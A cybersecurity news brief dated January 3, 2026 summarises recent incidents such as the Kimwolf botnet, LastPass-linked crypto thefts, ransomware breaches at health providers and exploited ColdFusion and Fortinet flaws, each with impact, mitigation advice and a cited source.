Svoboda Cybersecurity Brief January 03, 2026

Kimwolf Botnet Exploits Proxy Networks to Infect Local Devices

The Kimwolf botnet has infected over 2 million devices globally, primarily Android TV boxes and digital photo frames, by tunneling through residential proxy networks like IPIDEA. The malware exploits Android Debug Bridge (ADB) mode enabled by default on compromised devices, allowing unauthenticated remote access. The botnet conducts DDoS attacks, ad fraud, and data exfiltration.
Impact: Mass device compromise, network infiltration, and abuse of trusted proxy services.
Mitigation: Disable ADB mode on Android devices, avoid unofficial TV boxes, and monitor internal networks for suspicious activity.
Source: KrebsOnSecurity

LastPass Breach Linked to $35M Cryptocurrency Theft

Ongoing cryptocurrency thefts totaling $35 million have been traced to the 2022 LastPass breach, where attackers stole encrypted password vaults. Weak master passwords allowed offline cracking, with funds laundered via Wasabi Wallet’s CoinJoin and Russian exchanges. The thefts occurred in waves over years.
Impact: Compromised wallets, financial losses, and persistent threat due to delayed decryption.
Mitigation: Reset master passwords, migrate crypto assets to new wallets, and monitor for unauthorized transactions.
Source: BleepingComputer

Transparent Tribe Targets Indian Entities with New RAT

APT36 (Transparent Tribe) deployed a new remote access trojan (RAT) via phishing emails with weaponized LNK files masquerading as PDFs. The malware adapts persistence based on installed AV solutions and exfiltrates data via C2 servers. Targets include Indian government and academic organizations.
Impact: Persistent access, data theft, and espionage.
Mitigation: Block LNK files in emails, enforce endpoint AV, and monitor for unusual HTA script execution.
Source: TheHackerNews

Covenant Health Breach Exposes 478K Patients to Qilin Ransomware

Covenant Health revised its breach impact to 478,188 individuals after Qilin ransomware stole 852 GB of data, including SSNs and medical records. The attack occurred in May 2025, with data leaked after ransom negotiations failed.
Impact: Sensitive health data exposure, identity theft risks.
Mitigation: Offer identity protection services, audit third-party forensic reviews, and segment critical healthcare systems.
Source: SecurityWeek

RondoDox Botnet Exploits React2Shell in Next.js Servers

The RondoDox botnet targets CVE-2025-55182 (React2Shell) in Next.js servers, deploying Mirai variants and cryptocurrency miners. The botnet uses Linux payloads and credential theft for lateral movement.
Impact: Server compromise, botnet enrollment, and resource abuse.
Mitigation: Patch React/Next.js, disable unused RSC endpoints, and monitor for suspicious outbound connections.
Source: SecurityWeek

Google Cloud Phishing Campaign Abuses Legitimate Email Service

Attackers sent 9,394 phishing emails from noreply-application-integration@google[.]com using Google Cloud’s Application Integration. The emails mimic voicemail alerts, redirecting to fake Microsoft login pages via trusted Google domains.
Impact: Credential theft, bypassing DMARC/SPF checks.
Mitigation: Train users to scrutinize unexpected Google notifications, enforce MFA, and monitor cloud service usage.
Source: TheHackerNews

Adobe ColdFusion Servers Targeted in Mass Exploitation Campaign

A campaign exploited 11 ColdFusion vulnerabilities (2023–2024) during Christmas 2025, using JNDI/LDAP injection for initial access. Over 6,000 requests targeted US and Spanish servers.
Impact: Server compromise, potential ransomware deployment.
Mitigation: Patch ColdFusion, restrict JNDI/LDAP endpoints, and monitor for unusual callback traffic.
Source: SecurityWeek

Cybersecurity Professionals Plead Guilty in BlackCat Ransomware Scheme

Two US cybersecurity negotiators pleaded guilty to conducting BlackCat ransomware attacks, extorting $1.2 million. The DOJ linked them to over 1,000 victims.
Impact: Insider threats, reputational damage to security firms.
Source: SecurityWeek

ManageMyHealth Breach Exposes 108K NZ Patient Records

A breach at NZ’s ManageMyHealth portal potentially affected 108,000–126,000 users, with clinicians’ access to medical records compromised.
Impact: Unauthorized access to sensitive health data.
Mitigation: Notify affected users, audit access logs, and enforce stricter authentication.
Source: DataBreaches.net

NIST Releases Draft AI Cybersecurity Framework

NIST published a preliminary Cybersecurity Framework Profile for AI, outlining secure AI deployment and adversarial defense strategies. The draft aligns with CSF 2.0.
Source: DataBreaches.net

European Space Agency Confirms Server Breach

ESA confirmed a breach of external servers storing unclassified engineering data after a threat actor posted claims on BreachForums.
Impact: Potential intellectual property theft.
Mitigation: Isolate affected systems, review collaborative project access.
Source: DataBreaches.net

Trust Wallet Hack Tied to Shai-Hulud NPM Attack

A $8.5 million theft from Trust Wallet’s Chrome extension was linked to the Shai-Hulud npm supply-chain attack, which leaked developer secrets.
Impact: Compromised wallet data, fraudulent transactions.
Mitigation: Revoke API keys, monitor for malicious extension updates.
Source: BleepingComputer

Fortinet Firewalls Vulnerable to 5-Year-Old 2FA Bypass

Over 10,000 Fortinet firewalls remain exposed to CVE-2020-12812, allowing 2FA bypass via LDAP. Shadowserver tracks ongoing exploitation.
Impact: Unauthorized admin access, ransomware risk.
Mitigation: Patch FortiOS or disable username-case-sensitivity.
Source: BleepingComputer

Share this brief: https://svo.bz/GSMg